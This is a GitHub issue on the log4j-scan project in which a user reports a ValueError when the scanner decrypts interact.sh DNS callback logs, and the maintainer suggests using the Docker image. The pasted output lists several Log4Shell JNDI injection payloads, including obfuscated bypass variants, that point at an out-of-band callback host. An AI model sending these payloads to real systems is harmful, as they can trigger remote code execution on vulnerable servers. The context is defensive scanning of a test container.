search

fullhunt / log4j-scan

A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228
MIT License
3.4k stars 739 forks source link

ValueError: Input strings must be a multiple of the segment size 16 in length when getting response from interact.sh #93

Closed framegrace closed 2 years ago

framegrace commented 2 years ago

Been trying the scanner on a vulnerable container, and when receiving the dns callback i get this error: (Only happens on vulnerable hosts)


[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
[•] Initiating DNS callback server (interact.sh).
[%] Checking for Log4j RCE CVE-2021-44228.
[•] URL: http://localhost:8080
[•] URL: http://localhost:8080 | PAYLOAD: ${jndi:ldap://localhost.1f510if35g814890896ybog35n0695p9u.interact.sh/dtrry9j}
[•] URL: http://localhost:8080 | PAYLOAD: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://localhost.1f510if35g814890896ybog35n0695p9u.interact.sh/dtrry9j}
[•] URL: http://localhost:8080 | PAYLOAD: ${${::-j}ndi:rmi://localhost.1f510if35g814890896ybog35n0695p9u.interact.sh/dtrry9j}
[•] URL: http://localhost:8080 | PAYLOAD: ${jndi:rmi://localhost.1f510if35g814890896ybog35n0695p9u.interact.sh}
[•] URL: http://localhost:8080 | PAYLOAD: ${${lower:jndi}:${lower:rmi}://localhost.1f510if35g814890896ybog35n0695p9u.interact.sh/dtrry9j}
[•] URL: http://localhost:8080 | PAYLOAD: ${${lower:${lower:jndi}}:${lower:rmi}://localhost.1f510if35g814890896ybog35n0695p9u.interact.sh/dtrry9j}
[•] URL: http://localhost:8080 | PAYLOAD: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://localhost.1f510if35g814890896ybog35n0695p9u.interact.sh/dtrry9j}
[•] URL: http://localhost:8080 | PAYLOAD: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://localhost.1f510if35g814890896ybog35n0695p9u.interact.sh/dtrry9j}
[•] URL: http://localhost:8080 | PAYLOAD: ${jndi:dns://localhost.1f510if35g814890896ybog35n0695p9u.interact.sh}
[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
[•] Waiting...
Traceback (most recent call last):
  File "log4j-scan.py", line 387, in <module>
    main()
  File "log4j-scan.py", line 376, in main
    records = dns_callback.pull_logs()
  File "log4j-scan.py", line 234, in pull_logs
    decrypt_data = self.__decrypt_data(aes_key, i)
  File "log4j-scan.py", line 247, in __decrypt_data
    plain_text = cryptor.decrypt(decode)
  File "/usr/lib/python3/dist-packages/Crypto/Cipher/blockalgo.py", line 295, in decrypt
    return self._cipher.decrypt(ciphertext)
ValueError: Input strings must be a multiple of the segment size 16 in length```
mazen160 commented 2 years ago

@framegrace It seems to be a dependency issue. Can you please use the Docker image version of the tool for better execution? It would help out in avoiding similar issues related to pycryptodotme